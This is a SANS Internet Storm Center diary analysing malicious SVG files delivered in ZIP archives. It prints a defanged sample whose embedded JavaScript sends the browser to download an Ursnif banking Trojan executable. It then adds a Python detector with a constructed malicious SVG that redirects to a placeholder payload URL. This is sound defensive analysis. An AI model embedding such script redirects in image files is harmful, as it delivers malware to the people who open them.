Malicious SVG Files in the Wild, (Tue, Jan 24th)

In November 2016, the Facebook Messenger application was used to deliver malicious SVG files to people [1]. SVG files (Scalable Vector Graphics) are vector images that can be displayed in most modern browsers (natively or via a specific plugin). More precisely, Internet Explorer 9 supports the basic SVG feature set and IE10 extended that support by adding SVG 1.1 filters. On Microsoft Windows, SVG files are handled by Internet Explorer by default.

From a file format point of view, SVG files are XML-based and can be edited/viewed via your regular text editor. Amongst all the specifications of the SVG format, we can read this one in the W3C recommendations [2]:

Scripting
All aspects of an SVG document can be accessed and manipulated using scripts in a similar way to HTML. The default scripting language is ECMAScript (closely related to JavaScript) and there are defined Document Object Model (DOM) objects for every SVG element and attribute. Scripts are enclosed in

As you can see, attackers have all the requirements to build malicious SVG files. A few days ago, I captured two samples via my honeypot:

  • 00967999543-(02).svg (MD5:6b9649531f35c7de78735aa45d25d1a7)
  • P0039988439992_001.jpg.svg (MD5:e2f7245d016c52fc9c56531e483e6cfb)

Those two pictures belong

_?xml version=1.0 standalone=no?_
_!DOCTYPE svg PUBLIC -//W3C//DTD SVG 1.1//EN http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd_
_svg xmlns=http://www.w3.org/2000/svg xmlns:xlink=http://www.w3.org/1999/xlink version=1.1_
  _image width=1000 height=900 xlink:href=base64, … … … /_
  _script type=application/javascript_ … … …]] _/script_
_/svg_

(The _ character has been used in place of the angle brackets to prevent the code from being interpreted by readers' browsers.)

setTimeout(function () { window.location.href = hxxp://juanpedroperez.com/fotos/photos/xfs_extension.exe

The PE file is not available anymore at the location above, but here is a link [3] to the sample (it was an Ursnif banking Trojan [4]). The malicious SVG file is, of course, delivered via a ZIP archive. At the moment, those two malicious files are detected by most antivirus products, but other waves may be launched. Keep an eye on this file format: it is one more file extension to take care of.
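The structure shown above (an image element plus a script element whose code rewrites window.location) is what a defender can key on. The following Python script is an added example written for this diary, not code from the original post or from the ISC: it parses an SVG with the standard library XML parser, flags script elements, event-handler attributes, javascript: and external hrefs and redirect-style statements inside scripts, and then applies the same checks to the .svg members of a ZIP archive, also flagging double extensions such as .jpg.svg. The two SVG samples, the ZIP and the placeholder URL (example.invalid) are constructed for the example; the filename P0039988439992_001.jpg.svg is taken from the diary.

```python
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Constructed sample modelled on the skeleton in the diary: an <image> element
# followed by a <script> that redirects the browser. The payload URL is a
# harmless placeholder (example.invalid), not the real one from the diary.
MALICIOUS_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <image width="1000" height="900" xlink:href="data:image/png;base64,AAAA"/>
  <script type="application/javascript"><![CDATA[
    setTimeout(function () { window.location.href = "http://example.invalid/payload.exe"; }, 1000);
  ]]></script>
</svg>
"""

# Constructed benign sample: a plain vector drawing with no script or handler.
BENIGN_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <rect width="10" height="10" fill="blue"/>
</svg>
"""

# Assignments to location / location.href and calls to location.replace/assign.
REDIRECT_RE = re.compile(
    r"(?:window\.|document\.)?location(?:\.href)?\s*=[^=]|location\.(?:replace|assign)\s*\(",
    re.IGNORECASE,
)
# Image-like or document-like extension hiding in front of .svg.
DOUBLE_EXT_RE = re.compile(r"\.(?:jpe?g|png|gif|bmp|pdf|docx?)\.svg$", re.IGNORECASE)


def _local(name: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1]


def analyse_svg(data: bytes) -> list[str]:
    """Return a sorted list of indicators found in one SVG document."""
    try:
        root = ET.fromstring(data)  # expat does not fetch the external DTD
    except ET.ParseError:
        return ["xml-parse-error"]
    findings: set[str] = set()
    for elem in root.iter():
        if not isinstance(elem.tag, str):  # skip comments / processing instructions
            continue
        tag = _local(elem.tag)
        if tag == "script":
            findings.add("script-element")
            if REDIRECT_RE.search(elem.text or ""):
                findings.add("redirect-in-script")
        elif tag == "foreignObject":  # lets arbitrary HTML be embedded in the SVG
            findings.add("foreignObject-element")
        for attr, value in elem.attrib.items():
            name = _local(attr).lower()
            val = value.strip().lower()
            if name.startswith("on"):  # onload=, onclick=, ... run script too
                findings.add(f"event-handler:{name}")
            if name == "href":
                if val.startswith("javascript:"):
                    findings.add("javascript-uri")
                elif val.startswith(("http://", "https://")):
                    findings.add("external-href")
    return sorted(findings)


def build_sample_zip() -> bytes:
    """Constructed ZIP archive mimicking the delivery described in the diary."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("P0039988439992_001.jpg.svg", MALICIOUS_SVG)
        zf.writestr("logo.svg", BENIGN_SVG)
    return buf.getvalue()


def scan_zip(zip_bytes: bytes) -> dict[str, list[str]]:
    """Analyse every .svg member of a ZIP archive; map member name -> indicators."""
    report: dict[str, list[str]] = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".svg"):
                continue
            findings = analyse_svg(zf.read(info))
            if DOUBLE_EXT_RE.search(info.filename):
                findings.append("double-extension")
            report[info.filename] = sorted(findings)
    return report


if __name__ == "__main__":
    for member, indicators in scan_zip(build_sample_zip()).items():
        print(f"{member}: {indicators or 'clean'}")
```

A script element is not proof of malice on its own (legitimate interactive SVGs use scripting), so the indicators are best combined: a script that rewrites the location, arriving inside a ZIP under a double extension, is the pattern this diary describes. For untrusted input at scale, parse with defusedxml rather than the standard parser to avoid entity-expansion attacks against the scanner itself.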

[1] http://securityaffairs.co/wordpress/53650/malware/svg-images-locky.html
[2] https://www.w3.org/TR/SVG11/script.html
[3] https://www.virustotal.com/en/file/3af18232a9175dea624a7947e6edef6a57457bdf6d3ba0ead58856a139db2832/analysis/
[4] https://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Win32/Ursnif

Xavier Mertens (@xme)
ISC Handler – Freelance Security Consultant
PGP Key


(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.